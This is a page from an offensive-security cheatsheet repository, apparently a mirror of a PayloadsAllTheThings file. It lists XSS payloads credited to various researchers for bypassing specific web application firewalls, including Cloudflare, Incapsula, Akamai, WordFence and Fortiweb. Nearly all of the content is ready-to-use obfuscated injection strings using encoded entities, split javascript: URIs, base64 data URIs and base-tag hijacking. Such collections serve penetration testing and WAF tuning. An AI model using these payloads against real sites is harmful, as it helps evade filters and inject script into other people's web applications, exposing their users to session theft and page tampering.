daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

3-xss-common-waf-bypass.md (3456B)


      1 ---
      2 title: "Common WAF Bypass"
      3 topic: "XSS Injection"
      4 topicSlug: "xss-injection"
      5 sourcePath: "XSS Injection/3 - XSS Common WAF Bypass.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSS%20Injection/3%20-%20XSS%20Common%20WAF%20Bypass.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Common WAF Bypass
     12 
     13 > WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
     14 
     15 ## Summary
     16 
     17 * [Cloudflare](#cloudflare)
     18 * [Chrome Auditor](#chrome-auditor)
     19 * [Incapsula WAF](#incapsula-waf)
     20 * [Akamai WAF](#akamai-waf)
     21 * [WordFence WAF](#wordfence-waf)
     22 * [Fortiweb WAF](#fortiweb-waf)
     23 
     24 ## Cloudflare
     25 
     26 * 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
     27 
     28     ```js
     29     <svg/onrandom=random onload=confirm(1)>
     30     <video onnull=null onmouseover=confirm(1)>
     31     ```
     32 
     33 * 21st April 2020 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
     34 
     35     ```js
     36     <svg/OnLoad="`${prompt``}`">
     37     ```
     38 
     39 * 22nd August 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
     40 
     41     ```js
     42     <svg/onload=%26nbsp;alert`bohdan`+
     43     ```
     44 
     45 * 5th June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
     46 
     47     ```js
     48     1'"><img/src/onerror=.1|alert``>
     49     ```
     50 
     51 * 3rd June 2019 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
     52 
     53     ```js
     54     <svg onload=prompt%26%230000000040document.domain)>
     55     <svg onload=prompt%26%23x000000028;document.domain)>
     56     xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
     57     ```
     58 
     59 * 22nd March 2019 - @RakeshMane10
     60 
     61     ```js
     62     <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
     63     ```
     64 
     65 * 27th February 2018
     66 
     67     ```html
     68     <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
     69     ```
     70 
     71 ## Chrome Auditor
     72 
     73 NOTE: Chrome Auditor is deprecated and removed on latest version of Chrome and Chromium Browser.
     74 
     75 * 9th August 2018
     76 
     77     ```javascript
     78     </script><svg><script>alert(1)-%26apos%3B
     79     ```
     80 
     81 ## Incapsula WAF
     82 
     83 * 11th May 2019 - [@daveysec](https://twitter.com/daveysec/status/1126999990658670593)
     84 
     85     ```js
     86     <svg onload\r\n=$.globalEval("al"+"ert()");>
     87     ```
     88 
     89 * 8th March 2018 - [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)
     90 
     91     ```javascript
     92     anythinglr00</script><script>alert(document.domain)</script>uxldz
     93     anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
     94     ```
     95 
     96 * 11th September 2018 - [@c0d3G33k](https://twitter.com/c0d3G33k)
     97 
     98     ```javascript
     99     <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
    100     ```
    101 
    102 ## Akamai WAF
    103 
    104 * 18th June 2018 - [@zseano](https://twitter.com/zseano)
    105 
    106     ```javascript
    107     ?"></script><base%20c%3D=href%3Dhttps:\mysite>
    108     ```
    109 
    110 * 28th October 2018 - [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480)
    111 
    112     ```svg
    113     <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
    114     ```
    115 
    116 ## WordFence WAF
    117 
    118 * 12th September 2018 - [@brutelogic](https://twitter.com/brutelogic)
    119 
    120     ```html
    121     <a href=javas&#99;ript:alert(1)>
    122     ```
    123 
    124 ## Fortiweb WAF
    125 
    126 * 9th July 2019 - [@rezaduty](https://twitter.com/rezaduty)
    127 
    128     ```javascript
    129     \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
    130     ```